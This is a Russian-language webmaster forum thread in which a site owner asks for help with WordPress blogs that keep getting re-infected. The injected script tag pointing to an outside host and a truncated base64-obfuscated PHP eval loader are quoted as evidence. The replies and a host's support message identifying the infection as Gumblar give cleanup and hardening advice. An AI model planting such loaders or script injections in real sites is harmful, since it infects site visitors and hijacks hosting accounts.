С нами с 13.08.07
Сообщения: 75
Рейтинг: -8
|
Добавлено: 22/07/10 в 07:55 |
Всем привет Суть проблемы такова. На всех блогах и сайтах на одном аккуанте хостгатора, появляется код - <script src=http://ikwileencargobee.nl/images/index.php ></script> просмотрев файлы блогов на некоторых обнаружил эту хрень <?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYnQ1MicpKXtmdW5jdGlvbiBidDUyKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwp ==')); ?> (уменьшенная)
Удалив этот код из всех файлов злосчастный скрипт исчезает со страниц, но спустя какое-то время вся эта хрень появляется вновь. Замена пароля не помогает.
Хотелось бы узнать побольше о этой хрени и о том как предотвратить это всё
Ещё вопрос по ХостГатору – можно ли на нём ограничить доступ по IP через .ftpaccess (просто что-то не получается) и вообще как лучше защититься в такой ситуации.
|
|
|
|
С нами с 28.02.03
Сообщения: 8541
Рейтинг: 1609
|
Добавлено: 22/07/10 в 08:12 |
Обнови скрипт на всех блогах очени может быть внем дыра
потому даже если ты заблочеш через .ftpaccess тебя серовно венисут
ps: убери с морды блога название и версию скрипта
|
|
Сдам место в подписи. Предложения в личку.
|
3
|
|
|
Добрых Дел Мастер
С нами с 03.05.08
Сообщения: 3143
Рейтинг: 1227
|
Добавлено: 22/07/10 в 08:25 |
не придумывай ничего ограничивать. какой двиг? скрипт только на морде? ищи дырку. а пока напиши чекалку которая будет по курлу забирать морды твоих сайтов, их парсить на предмет <script>(.*?)</script> и в браузер выдавать отчет со списком:
-сайт
--script:содержимое
и по крону гоняй раз в день
|
|
|
|
С нами с 13.08.07
Сообщения: 75
Рейтинг: -8
|
Добавлено: 22/07/10 в 08:49 |
движок Wordpress - скрипт раставлен на всех страницах - даже на фрисайтах
|
|
|
|
С нами с 28.02.03
Сообщения: 8541
Рейтинг: 1609
|
Добавлено: 22/07/10 в 08:55 |
|
|
Сдам место в подписи. Предложения в личку.
|
3
|
|
|
С нами с 13.08.07
Сообщения: 75
Рейтинг: -8
|
Добавлено: 22/07/10 в 09:15 |
а как проверить веб шел?
|
|
|
|
С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
Добавлено: 22/07/10 в 09:22 |
Свой комп проверь на наличие вирусов. Смени FTP пароль с другого компа. Если не помогает стучи супорту или сам логи посмотри.
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
3
|
|
|
programmer
С нами с 08.12.02
Сообщения: 7613
Рейтинг: 5760
|
Добавлено: 22/07/10 в 10:24 |
warik:
практически никак. сравнивая файло на предмет даты-размера-овнера.
но шелл тупо может лежать выше
|
|
|
|
С нами с 13.08.07
Сообщения: 75
Рейтинг: -8
|
Добавлено: 23/07/10 в 10:22 |
Эта хрень есть и на другом акуанте дрогого хост-провайдера. Может правда вирус на компе, но ESET походу не видит. БЫЛО У КОГО ТАКОЕ?
Последний раз редактировалось: warik (23/07/10 в 16:29), всего редактировалось 1 раз
|
|
|
|
С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
Добавлено: 23/07/10 в 11:01 |
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
3
|
|
|
Мотиватор :)
С нами с 06.05.09
Сообщения: 3028
Рейтинг: 607
|
Добавлено: 23/07/10 в 12:44 |
у меня было такое. решилось сменой ВСЕХ паролей на фтп и перезаливкой файлов. эта хрень скорее всего не у тебя на компе.
|
|
|
|
С нами с 13.08.07
Сообщения: 75
Рейтинг: -8
|
Добавлено: 23/07/10 в 13:37 |
А конкретнее о перезаливке. Какие файлы и как перезаливал?
|
|
|
|
С нами с 14.10.02
Сообщения: 462
Рейтинг: 727
|
Добавлено: 23/07/10 в 15:26 |
Перезалить те файлы, где есть этот код.
|
|
Лучшие сайты в интеррасиал нише здесь Dogfart Зачетные RSS,FHG, и др. класные Промо
|
3
|
|
|
С нами с 01.03.06
Сообщения: 629
Рейтинг: 620
|
Добавлено: 23/07/10 в 19:47 |
я бы еще права и овнеров на файлах и папках посмотрел.
если править файлы юзер от которого работает апач не может, то имеют акк через фтп/ссх или вообще весь хост через ссх.
|
|
|
|
С нами с 21.09.03
Сообщения: 7329
Рейтинг: 2144
|
Добавлено: 23/07/10 в 20:12 |
Heavy писал: | я бы еще права и овнеров на файлах и папках посмотрел. |
Это первое, с чего надо начинать.
|
|
|
|
С нами с 13.08.07
Сообщения: 75
Рейтинг: -8
|
Добавлено: 27/07/10 в 08:46 |
Hello,
This is a common Gumblar variant. http://en.wikipedia.org/wiki/Gumblar
I would recommend you follow these instructions before you type that password into your FTP program. Otherwise your site will immediately get infected again.
1. Use the following online vulnerability scanner and ensure your software is up-to-date: http://secunia.com/vulnerability_scanning/online/?task=load
2. Download anti-virus and fully scan your PC for malicious files. Here are some free online scanners for Windows, which is typically the most vulnerable to infection. If you have a different OS, there are similar programs that can
be located and run on your system to protect it in the same way:
MalwareBytes ( http://www.malwarebytes.org/ ) and
ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean a recent strain of malware that resists detection by almost all other anti-virus agents. It is highly suggested that you
one or both of them and one of the following:
-http://housecall.trendmicro.com/
-http://www.bitdefender.com/scan8/ie.html
-http://www.kaspersky.com/virusscanner
-http://support.f-secure.com/enu/home/ols.shtml
-http://www.eset.com
3. Update all passwords for any account that you access/own that may not be up to standards. Any passwords that have been compromised will need to be changed as well. Standards for secure passwords are available:
http://en.wikipedia.org/wiki/Password_strength#Guidelines_for_strong_passwords
4. Ensure that all scripts/plugins/modules/components are updated to the most recent released version, as new versions are released primarily to address known security vulnerabilities in these sites.
5. Keep your computer secure from malware infecting it. If your computer is compromised, your account can be compromised through your password being used to access it.
- Ensure you use the latest browser version; Ensure that said browser subscribes to Google's blacklist API (Mozilla Firefox, Google Chrome, Safari)
- Disable javascript
- Use the firefox addon noscript
- Make sure your antivirus has a subscription to new database and version releases. This may cost some amount of money, but is well worth the expense.
- Use http://www.avg.com.au/index.cfm?section=avg&action=onlinescan to test suspicious links you are given in emails or find online.
6. Ensure that all database configurations for your account are using a custom generated user and password combination, and that this information is not stored in plain text if this is feasible. Using your cPanel username and
password to access your databases for your site may be convenient, but it introduces an incredible security risk.
7. Audit your account for unnecessary scripts, such as file uploaders. Ensure that if they are necessary that they are password protected, or if that is not feasible that they check the file type before allowing upload, to prevent
upload of certain types of files.
8. Confirm that the permissions on the public_html folder is set to 750, as permissions of 755 will allow excessive amounts of malicious activity to the account.
9. Ensure that extended logging is enabled on your account so that any compromise can be investigated, as logs are regularly removed when statistics are run.
Thanks,
|
|
|
|